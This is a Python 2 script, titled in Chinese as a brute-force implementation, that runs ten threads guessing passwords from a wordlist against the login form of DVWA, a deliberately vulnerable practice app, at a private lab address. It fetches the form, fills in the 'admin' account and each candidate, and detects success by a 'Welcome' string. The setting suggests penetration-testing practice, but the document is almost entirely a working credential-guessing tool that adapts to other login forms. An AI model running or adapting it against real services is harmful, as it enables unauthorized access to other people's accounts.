python实现暴力破解

import urllib2
import urllib
import cookielib
import  threading
import sys
import Queue
from HTMLParser import HTMLParser

# Number of worker threads started by Bruter.run_bruteforce().
user_thread = 10
# Account name submitted with every attempt (defaults to admin).
username = "admin"
# Text file holding the candidate passwords, one per line.
wordlist_file = "pass.txt"
# Wordlist entry to resume after; None means start from the first line.
resume = None

# Page that serves the login form, and the URL the form is posted to.
target_url = "http://192.168.31.113:8080/dvwa/login.php"
target_post = "http://192.168.31.113:8080/dvwa/login.php"

# Form field that carries the user name.
username_field = "username"
# Form field that carries the password.
password_field = "password"

# Substring looked for in the response body to decide the login succeeded.
success_check = "Welcome"


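class BruteParser(HTMLParser):
    """Collect the name/value pairs of every <input> element in a page.

    After feed(), ``tag_results`` maps each input's ``name`` attribute to
    its ``value`` attribute (None when the element has no ``value``).
    Inputs without a ``name`` are skipped; a later input with the same
    name overwrites an earlier one.
    """

    def __init__(self):
        HTMLParser.__init__(self)
        # name attribute -> value attribute for each <input> seen so far
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        """Record the name and value of an <input> start tag.

        ``attrs`` is the list of (attribute name, attribute value) pairs
        supplied by HTMLParser, e.g. for
        <input type="hidden" name="NXX" id="IDXX" value="VXX" /> it is
        [("type", "hidden"), ("name", "NXX"), ("id", "IDXX"), ("value", "VXX")].
        """
        if tag != "input":
            return

        tag_name = None
        tag_value = None
        for attr_name, attr_value in attrs:
            if attr_name == "name":
                tag_name = attr_value
            if attr_name == "value":
                tag_value = attr_value

        # Store once, after every attribute has been read, and store the
        # value attribute itself. The earlier version stored whatever
        # attribute happened to come last after "name", so the result
        # depended on attribute order (an id or type could be recorded
        # in place of the real value).
        if tag_name is not None:
            self.tag_results[tag_name] = tag_value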






class Bruter():
    """Queue the wordlist and try each entry against the login form.

    Every attempt is a fresh GET of the login page followed by a POST of
    the form, so on the server this shows up as ``user_thread`` parallel
    streams of failed logins for a single account, which is the pattern
    that account lockout, rate limiting and failed-login alerting are
    meant to catch.
    """

    def __init__(self):
        """Load the wordlist into a queue, honouring the resume marker."""
        # Read the whole password file up front.
        handle = open(wordlist_file, "rb")
        lines = handle.readlines()
        handle.close()

        pending = Queue.Queue()
        resumed = False
        for line in lines:
            candidate = line.rstrip()
            if resume is None or resumed:
                pending.put(candidate)
            elif candidate == resume:
                # Entries up to and including the marker are skipped;
                # everything after it is queued.
                resumed = True
                print("resuming from"+resume)

        self.username = username
        self.password_q = pending   # candidates still to be tried
        self.found = False          # set once a response matches success_check
        print("finish setting for: %s" % username)

    def web_bruter(self):
        """Worker loop: take candidates until the queue is empty or one matches."""
        # NOTE(review): empty() followed by get() is not atomic across
        # threads; a worker can block in get() if another thread takes
        # the last entry in between.
        while True:
            if self.password_q.empty() or self.found:
                break
            candidate = self.password_q.get().rstrip()

            # A new cookie jar per attempt, so each attempt gets its own session.
            cookie_jar = cookielib.FileCookieJar("cookies")
            session = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))

            # Fetch the login page to pick up the form's current input fields.
            form_html = session.open(target_url).read()
            print("plan to brute")

            form_parser = BruteParser()
            form_parser.feed(form_html)
            form_fields = form_parser.tag_results

            # Overwrite the credential fields; other inputs are sent as parsed.
            form_fields[username_field] = self.username
            form_fields[password_field] = candidate

            # URL-encode the fields and submit them with the same opener.
            encoded_form = urllib.urlencode(form_fields)
            body = session.open(target_post, encoded_form).read()

            # Success is decided purely by a substring match on the response.
            if success_check in body:
                self.found = True
                print("success")
                # Prints the module-level username, not self.username.
                print(username+":"+candidate)

    def run_bruteforce(self):
        """Start ``user_thread`` threads, each running web_bruter()."""
        for _ in range(user_thread):
            threading.Thread(target=self.web_bruter).start()


# Load the wordlist into the queue, then start the worker threads.
bruter_obj = Bruter()
bruter_obj.run_bruteforce()